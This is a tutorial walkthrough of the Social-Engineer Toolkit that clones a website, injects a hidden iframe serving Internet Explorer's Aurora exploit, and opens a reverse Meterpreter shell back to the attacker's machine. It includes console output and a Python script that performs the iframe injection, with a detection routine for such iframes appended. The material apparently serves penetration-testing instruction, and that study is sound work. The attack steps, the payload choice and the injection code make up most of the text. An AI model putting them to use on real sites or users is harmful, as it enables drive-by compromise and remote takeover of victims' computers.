
The Social-Engineer Toolkit


SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
 Enter the url to clone: http://www.secmaniac.com

Select Website Attack Vectors from the SET main menu, and then select The Metasploit Browser Exploit Method. Then select the Site Cloner option, and enter http://www.secmaniac.com as the website you want to use for cloning.

Once the site is cloned, we'll set up the exploit to trigger when a target browses the site.

Enter the browser exploit you would like to use
 16. Microsoft Internet Explorer "Aurora"
Enter your choice (1-23) (enter for default): 16

What payload do you want to generate:
Name:                                      Description:
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
 Enter choice (example 1-10) (Enter for default):
Enter the port to use for the reverse (enter for default):

[*] Cloning the website: http://www.secmaniac.com
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.
[*] Launching MSF Listener...
[*] This may take a few to load MSF...

resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started reverse handler on 10.10.1.112:443
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http:// 10.10.1.112:8080/
[*] Server started.

To complete the attack setup, select the client-side exploit you wish to use. Above, we chose the infamous Internet Explorer Aurora exploit (ms10_002_aurora) and accepted the default reverse Meterpreter payload and the default reverse port by pressing ENTER; the listener output confirms the handler bound to 10.10.1.112:443 and the cloned site being served on port 8080.

When the target reaches the cloned copy of http://www.secmaniac.com/ (served from the attacking machine, here http://10.10.1.112:8080/, so the target must be lured to that address by a link, a redirect, or a spoofed name rather than to the real site), the page looks normal, but the browser is compromised through an iframe injection. SET automatically rewrites the cloned HTML to contain a hidden iframe that houses the Metasploit client-side attack. The exploit only fires if the target's browser is actually vulnerable to the one selected; with Aurora that means an unpatched Internet Explorer affected by MS10-002.
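The rewrite SET performs is simple to reproduce and to check for. The following is an added example, not SET's or Metasploit's own code: it injects a zero-size hidden iframe pointing at the exploit server into a cloned page, and then runs a defender-side check that flags hidden iframes whose source is a different host than the page itself. The cloned HTML is a constructed stand-in, and the exploit URL is assumed to be the Metasploit server address from the listing above (http://10.10.1.112:8080/).

```python
"""
Added example (not SET's own code): rewrite a cloned page to carry a hidden
iframe that points at the browser-exploit server, and a defender-side check
that spots such iframes. All input below is constructed for the example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for the page the site cloner fetched.
CLONED_HTML = """<html><head><title>SecManiac</title></head>
<body><h1>Welcome</h1><p>Nothing to see here.</p></body></html>"""

# Assumption: the Metasploit browser exploit server from the listing.
EXPLOIT_URL = "http://10.10.1.112:8080/"

# Hidden 0x0 iframe: the page renders unchanged, the browser still loads src.
IFRAME_TEMPLATE = ('<iframe src="%s" width="0" height="0" frameborder="0" '
                   'style="visibility:hidden;display:none"></iframe>')


def inject_iframe(html: str, exploit_url: str) -> str:
    """Insert the hidden iframe just before the last </body> tag.

    If the page has no </body>, the iframe is appended; browsers still
    render it.
    """
    iframe = IFRAME_TEMPLATE % exploit_url
    closes = list(re.finditer(r"</body\s*>", html, re.IGNORECASE))
    if not closes:
        return html + iframe
    idx = closes[-1].start()
    return html[:idx] + iframe + html[idx:]


class IframeCollector(HTMLParser):
    """Collect the attribute dicts of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def find_hidden_offsite_iframes(html: str, page_host: str) -> list:
    """Return src values of iframes that are hidden AND load from another host.

    A legitimate page rarely needs an invisible frame from a foreign origin;
    this is the signature of the injection above.
    """
    collector = IframeCollector()
    collector.feed(html)
    hits = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        # Relative src (no host) resolves to the page's own host.
        host = urlparse(src).hostname or page_host
        style = attrs.get("style", "").replace(" ", "").lower()
        hidden = (attrs.get("width") == "0" or attrs.get("height") == "0"
                  or "display:none" in style or "visibility:hidden" in style)
        if hidden and host != page_host:
            hits.append(src)
    return hits


if __name__ == "__main__":
    poisoned = inject_iframe(CLONED_HTML, EXPLOIT_URL)
    print(poisoned)
    print("suspicious iframes:",
          find_hidden_offsite_iframes(poisoned, "www.secmaniac.com"))
```

The detection half is deliberately conservative: it ignores visible iframes and same-host frames, so it flags the injected frame without tripping on ordinary embedded content; a real-world scanner would also resolve relative URLs and treat CSS classes that hide the element.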

Back at the attacking machine, we see that the attack is successful. The Meterpreter session has established the connection from the target to the attacking machine, and we have full access to the system, as shown here.